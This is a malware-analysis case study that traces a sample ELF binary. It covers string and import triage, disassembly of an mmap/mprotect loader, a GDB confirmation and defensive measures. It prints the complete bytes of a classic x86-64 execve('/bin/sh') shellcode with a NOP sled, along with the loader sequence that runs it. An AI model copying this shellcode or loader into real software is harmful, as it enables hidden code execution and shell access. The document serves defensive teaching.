Case Study 34-2: Malware Analysis — Identifying Shellcode in a Binary
Introduction
Malware analysis is one of the most important applications of reverse engineering. Security analysts examine malicious binaries to understand their behavior, extract indicators of compromise (IOCs), and develop defenses. This case study examines a sample binary with characteristics drawn from historical malware patterns: specifically, a binary that appears legitimate but contains embedded shellcode and in-memory code execution indicators.
🔐 Security Note: This analysis is based on patterns from documented, historical malware behaviors. The techniques described are used by malware analysts at security companies, national CERTs, and incident response teams to understand and defend against threats. No functional attack tools are described or provided. Understanding how these techniques work is essential for defending against them.
The Sample Binary
Our sample, sample.elf, presents itself as a benign utility but contains suspicious code patterns. The goal is to identify the malicious components through static and dynamic analysis.
$ file sample.elf
sample.elf: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped
$ ls -la sample.elf
-rwxr-xr-x 1 analyst analyst 18432 Mar 15 14:22 sample.elf
$ md5sum sample.elf
a1b2c3d4e5f6789012345678abcdef01 sample.elf
Phase 1: Static Triage
Initial string analysis:
$ strings -n 4 sample.elf | sort
/bin/bash
/proc/self/maps
/tmp/.cache
GET / HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0
connect
mmap
mprotect
munmap
open
read
socket
write
Immediate red flags:
- /proc/self/maps: the program inspects its own memory map (suspicious for a "utility")
- /tmp/.cache: a hidden path under /tmp, a common staging location for dropped files
- mmap, mprotect, munmap: memory allocation with permission changes (a shellcode loading pattern)
- Network-related strings alongside /proc/self/maps
$ objdump -T sample.elf
DYNAMIC SYMBOL TABLE:
mmap64
mprotect
munmap
socket
connect
send
recv
open
read
write
exit
The combination of mmap/mprotect with network functions (socket, connect, send, recv) is a classic dropper or implant pattern: download shellcode, allocate executable memory, copy and execute.
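The import triage above can be sketched as a small script. This is a minimal illustration, not a vetted ruleset: the function name `triage_imports` and the two API groupings are assumptions made for this example, and the input list simply mirrors the symbol names shown in the objdump output.

```python
# Hypothetical triage helper. The groupings are illustrative assumptions,
# not an established detection rule.
MEMORY_APIS = {"mmap", "mmap64", "mprotect"}
NETWORK_APIS = {"socket", "connect", "send", "recv"}

def triage_imports(imports):
    """Return human-readable findings for a collection of imported symbol names."""
    names = set(imports)
    findings = []
    mem = sorted(names & MEMORY_APIS)
    net = sorted(names & NETWORK_APIS)
    # Allocation plus a later permission change is the first thing to note.
    if "mprotect" in names and names & {"mmap", "mmap64"}:
        findings.append("allocates memory and changes its permissions: " + ", ".join(mem))
    # The combination with networking is what suggests a downloader or implant.
    if mem and net:
        findings.append("memory-permission APIs alongside network APIs: " + ", ".join(net))
    return findings

sample_imports = ["mmap64", "mprotect", "munmap", "socket", "connect",
                  "send", "recv", "open", "read", "write", "exit"]
for finding in triage_imports(sample_imports):
    print("[!]", finding)
```

A hit from a script like this is only a prompt for closer inspection: JIT compilers and language runtimes import the same functions for legitimate reasons.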
Phase 2: Identifying the Suspicious Function
Disassemble and look for the mmap call chain:
$ objdump -M intel -d sample.elf | grep -A3 -B3 "call.*mmap"
401581: bf 00 00 00 00 mov edi, 0x0 ; addr = NULL
401586: be 00 10 00 00 mov esi, 0x1000 ; length = 4096
40158b: ba 03 00 00 00 mov edx, 0x3 ; prot = PROT_READ|PROT_WRITE
401590: b9 22 00 00 00 mov ecx, 0x22 ; flags = MAP_PRIVATE|MAP_ANONYMOUS (4th argument of a function call goes in rcx; r10 is used only for raw syscalls)
401595: 45 31 c0 xor r8d, r8d ; fd = 0 (ignored on Linux with MAP_ANONYMOUS; portable code passes -1)
401598: 45 31 c9 xor r9d, r9d ; offset = 0
40159b: e8 xx xx xx xx call mmap64@plt
4015a0: 48 89 45 f8 mov [rbp-0x8], rax ; save mapped address
; ... copy code to mapped region ...
; ... then:
4015c8: 48 8b 7d f8 mov rdi, [rbp-0x8] ; address
4015cc: be 00 10 00 00 mov esi, 0x1000 ; length
4015d1: ba 05 00 00 00 mov edx, 0x5 ; prot = PROT_READ|PROT_EXEC !!!
4015d6: e8 xx xx xx xx call mprotect@plt ; make it executable
The PROT_READ|PROT_EXEC (0x5) call to mprotect after allocating MAP_ANONYMOUS memory is a strong indicator of in-memory shellcode execution, although JIT compilers legitimately use the same sequence. The pattern:
1. mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0): allocate writable memory (this sample passes fd = 0, which Linux ignores for anonymous mappings)
2. Copy code into it
3. mprotect(addr, size, PROT_READ|PROT_EXEC): make it executable
4. Call or jump to the new memory
This is the standard pattern for executing shellcode from memory without writing a separate executable to disk (fileless execution).
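The immediates in the disassembly (0x3, 0x22, 0x5) are easier to reason about once decoded into flag names. The following is a minimal sketch that assumes the Linux x86-64 values from `<sys/mman.h>`; the helper names `decode_bits` and `is_rw_then_rx` are hypothetical and exist only for this example.

```python
# Linux x86-64 constant values from <sys/mman.h>; only the common bits are listed.
PROT_BITS = {0x1: "PROT_READ", 0x2: "PROT_WRITE", 0x4: "PROT_EXEC"}
MAP_BITS = {0x01: "MAP_SHARED", 0x02: "MAP_PRIVATE",
            0x10: "MAP_FIXED", 0x20: "MAP_ANONYMOUS"}

def decode_bits(value, table):
    """Render a bitmask as NAME|NAME, keeping any unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"

def is_rw_then_rx(mmap_prot, mprotect_prot):
    """True when memory is mapped writable but not executable, then flipped to executable but not writable."""
    mapped_rw = bool(mmap_prot & 0x2) and not mmap_prot & 0x4
    flipped_rx = bool(mprotect_prot & 0x4) and not mprotect_prot & 0x2
    return mapped_rw and flipped_rx

print(decode_bits(0x3, PROT_BITS))   # PROT_READ|PROT_WRITE
print(decode_bits(0x22, MAP_BITS))   # MAP_PRIVATE|MAP_ANONYMOUS
print(decode_bits(0x5, PROT_BITS))   # PROT_READ|PROT_EXEC
print(is_rw_then_rx(0x3, 0x5))       # True
```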
Phase 3: Analyzing the Shellcode
Find the data being copied. Following the code between mmap and mprotect:
4015a5: 48 8b 45 f8 mov rax, [rbp-0x8] ; mapped memory
4015a9: 48 89 45 f0 mov [rbp-0x10], rax ; save dst
4015ad: 48 8d 35 4c 0a 00 00 lea rsi, [rip+0xa4c] ; source data (in .data)
4015b4: 48 8b 7d f0 mov rdi, [rbp-0x10] ; dst
4015b8: ba 48 00 00 00 mov edx, 0x48 ; 72 bytes
4015bd: e8 xx xx xx xx call memcpy@plt
The shellcode is 72 bytes (a 48-byte NOP sled followed by 24 bytes of code) located in the .data section at RIP+0xa4c, which resolves to 0x4015b4 + 0xa4c = 0x402000. Let's examine it:
$ objdump -M intel -s -j .data sample.elf
Contents of section .data:
402000 90909090 90909090 90909090 90909090 ................ ; NOP sled
402010 90909090 90909090 90909090 90909090 ................
402020 90909090 90909090 90909090 90909090 ................
402030 4831d248 bb2f2f62 696e2f73 68534889 H1.H.//bin/shSH.
402040 e74831c0 b03b0f05 .H1..;..
This is recognizable shellcode structure:
- 90 90 90 90 ...: NOP sled (48 bytes of NOPs before the actual code)
- 48 31 d2: xor rdx, rdx (envp = NULL)
- 48 bb 2f 2f 62 69 6e 2f 73 68: mov rbx, 0x68732f6e69622f2f (the eight bytes of the string //bin/sh as a little-endian 64-bit immediate)
- 53: push rbx (no NUL terminator is pushed, so the string is terminated only if the bytes above it on the stack are zero)
- 48 89 e7: mov rdi, rsp (point rdi to the string on the stack)
- 48 31 c0: xor rax, rax
- b0 3b: mov al, 59 (syscall number 59 = execve)
- 0f 05: syscall
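This is the core of a classic x86-64 execve shellcode, the minimal sequence to spawn a shell: rdi points to the path //bin/sh (which the kernel resolves like /bin/sh) and rdx (envp) is zero. The sequence never sets rsi (argv), so the call amounts to execve("/bin/sh", NULL, NULL) only if rsi is already zero on entry; textbook versions clear rsi explicitly. The NOP sled at the front is a historical reliability technique (Chapter 35).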
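The packing of the path string into a register immediate can be checked directly. This short sketch uses only Python's standard `struct` module; `mov rbx, imm64` (opcode bytes 48 bb) carries exactly eight immediate bytes, stored little-endian.

```python
import struct

path = b"//bin/sh"                     # exactly 8 bytes, so it fits one 64-bit register
imm = struct.unpack("<Q", path)[0]     # interpret the bytes as a little-endian integer
print(hex(imm))                        # 0x68732f6e69622f2f

# Re-encode the instruction: REX.W prefix + opcode (48 bb) followed by the immediate.
mov_rbx = b"\x48\xbb" + struct.pack("<Q", imm)
print(mov_rbx.hex(" "))                # 48 bb 2f 2f 62 69 6e 2f 73 68
```

The doubled leading slash is a common trick to pad /bin/sh to eight bytes so that the immediate contains no zero byte.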
Phase 4: The NOP Sled
A NOP sled (\x90\x90\x90...) is a sequence of no-operation instructions placed before shellcode. Its purpose: if execution lands anywhere in the sled, it slides down to the actual shellcode below. This mattered for stack-based exploits in which the attacker could only guess the approximate address of the buffer; ASLR later randomized addresses so widely that a sled alone rarely compensates.
Seeing a NOP sled in modern code suggests one of the following:
- Code written to be compatible with older exploitation techniques
- Repurposed code from an earlier era
- Deliberate imitation of old shellcode to evade signature-based detection
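In this sample, the NOP sled is 48 bytes. The loader transfers control to a region it mapped itself, so it does not need a sled for reliability; the sled's presence suggests the payload was written for, or reused from, a context where the landing address was imprecise.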
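Locating sleds in a byte buffer is a simple run-length scan. The sketch below is a minimal illustration; the function name `find_nop_sleds` and the 16-byte default threshold are assumptions chosen for this example, and runs of 0x90 can also appear as benign padding, so a hit is a lead rather than a verdict.

```python
def find_nop_sleds(data, min_len=16):
    """Return (offset, length) for each run of 0x90 bytes at least min_len long."""
    runs = []
    start = None
    for i, byte in enumerate(data):
        if byte == 0x90:
            if start is None:
                start = i              # a new run begins here
        elif start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None               # run ended on a non-NOP byte
    # Handle a run that extends to the end of the buffer.
    if start is not None and len(data) - start >= min_len:
        runs.append((start, len(data) - start))
    return runs

# Synthetic buffer: 4 filler bytes, a 48-byte sled, then the first bytes of code.
buf = b"\x00" * 4 + b"\x90" * 48 + b"\x48\x31\xd2"
print(find_nop_sleds(buf))             # [(4, 48)]
```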
Phase 5: Dynamic Confirmation with GDB
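Confirm the analysis by catching the mprotect call. The dynamic loader issues its own mprotect calls during startup, so continue past those hits until the arguments match the mapped region: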
$ gdb -q sample.elf
(gdb) catch syscall mprotect
Catchpoint 1 (syscall 'mprotect')
(gdb) run
Catchpoint 1 (call to syscall mprotect), 0x00007f... in mprotect ()
(gdb) info registers rdi rsi rdx
rdi 0x7f...a000 ; address of mapped region
rsi 0x1000 ; size 4096
rdx 0x5 ; PROT_READ|PROT_EXEC ← confirmed
(gdb) x/20xb 0x7f...a000
0x7f...a000: 90 90 90 90 90 90 90 90 ; NOP sled
0x7f...a008: 90 90 90 90 90 90 90 90
0x7f...a010: ...
(gdb) # Return from mprotect, then single-step toward the indirect call into the shellcode
(gdb) finish
(gdb) stepi
The analysis confirms: memory allocated, shellcode copied, permissions changed to executable. The shellcode will execute next.
Phase 6: Indicators of Compromise
From this analysis, we can extract IOCs:
- MD5 hash of the binary
- The shellcode bytes (for signature detection): the string load 48 bb 2f 2f 62 69 6e 2f 73 68 and the execve tail 53 48 89 e7 48 31 c0 b0 3b 0f 05
- The NOP sled signature: 16+ consecutive 0x90 bytes
- The behavioral pattern: mmap → memcpy → mprotect(PROT_EXEC) → indirect call
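The hash and byte-signature IOCs can be gathered with a few lines of standard-library Python. This is a sketch under stated assumptions: the function name `extract_iocs` and the two signature constants are hypothetical names for this example, SHA-256 is added alongside MD5 because it is the stronger identifier, and the demonstration runs on a synthetic buffer rather than the sample.

```python
import hashlib

# Byte signatures taken from the shellcode analysis; the names are illustrative.
STRING_LOAD = bytes.fromhex("48bb2f2f62696e2f7368")      # mov rbx, "//bin/sh"
EXECVE_TAIL = bytes.fromhex("534889e74831c0b03b0f05")    # push rbx ... syscall

def extract_iocs(blob):
    """Compute file hashes and the offsets of the two signatures (-1 if absent)."""
    return {
        "md5": hashlib.md5(blob).hexdigest(),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "string_load_offset": blob.find(STRING_LOAD),
        "execve_tail_offset": blob.find(EXECVE_TAIL),
    }

# Synthetic stand-in for file contents: padding, both signatures, padding.
blob = b"\x00" * 8 + STRING_LOAD + EXECVE_TAIL + b"\x00" * 8
iocs = extract_iocs(blob)
print(iocs["string_load_offset"], iocs["execve_tail_offset"])   # 8 18
```

For a real file, the blob would come from reading the binary in mode "rb".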
Defensive Implications
Understanding this attack pattern motivates several defenses:
- W^X (Write XOR Execute): Memory pages should never be simultaneously writable and executable. Hardened systems reject PROT_READ|PROT_WRITE|PROT_EXEC mappings (for example under SELinux's execmem restrictions or PaX MPROTECT), although a stock Linux kernel still permits them. This sample uses separate mmap (RW) and mprotect (RX) calls, so no page is ever writable and executable at the same time, which sidesteps a simple W^X check.
- seccomp-bpf: Restricting the system calls available to a process. If mprotect with PROT_EXEC were blocked, this technique would fail. Many sandboxes implement this.
- Integrity Monitoring: Detecting when executable memory is created at runtime (not from a mapped file). Tools like Falco or auditd can alert on mprotect calls that add PROT_EXEC.
- Memory Scanning: Scanning for NOP sled signatures in process memory is a detection technique used by some EDR products.
- Code Signing / Executable Whitelisting: Preventing execution of code not from signed files. mmap-and-execute bypasses this in older implementations; newer implementations (like Apple's Hardened Runtime) explicitly block JIT without an entitlement.
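The integrity-monitoring idea (executable memory that is not backed by a file) can be illustrated by parsing the text format of /proc/<pid>/maps. The following is a minimal sketch: the function name `anonymous_exec_regions` is hypothetical, the sample text is synthetic, and JIT-based runtimes will produce legitimate hits.

```python
def anonymous_exec_regions(maps_text):
    """Return (address_range, perms) for executable mappings with no backing path."""
    regions = []
    for line in maps_text.splitlines():
        # Fields: address perms offset dev inode [pathname]
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        addr_range, perms = fields[0], fields[1]
        path = fields[5].strip() if len(fields) > 5 else ""
        # Pseudo-paths such as [vdso] or [stack] are non-empty and therefore skipped.
        if "x" in perms and path == "":
            regions.append((addr_range, perms))
    return regions

# Synthetic example in the /proc/<pid>/maps layout.
sample_maps = """\
00400000-00402000 r-xp 00000000 08:01 131 /home/analyst/sample.elf
7f10a0000000-7f10a0001000 r-xp 00000000 00:00 0
7f10a0200000-7f10a0221000 rw-p 00000000 00:00 0
7ffd1c5f0000-7ffd1c5f2000 r-xp 00000000 00:00 0 [vdso]
"""
print(anonymous_exec_regions(sample_maps))
# [('7f10a0000000-7f10a0001000', 'r-xp')]
```

On a live Linux system the input would be the contents of /proc/<pid>/maps for the process under inspection.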
Lessons for Defenders
This analysis demonstrates what a malware analyst does in practice: identify the high-level behavior from strings and imports, trace the suspicious code paths in the disassembly, confirm the behavior in GDB, and extract actionable IOCs. No single technique is sufficient — the combination of string analysis, dynamic import inspection, disassembly, and dynamic tracing gives a complete picture.
Understanding shellcode at the assembly level is what allows analysts to recognize it after unpacking compressed, obfuscated, or network-transmitted payloads. Once the bytes are decoded, the execve syscall sequence is identifiable regardless of how the surrounding code is structured.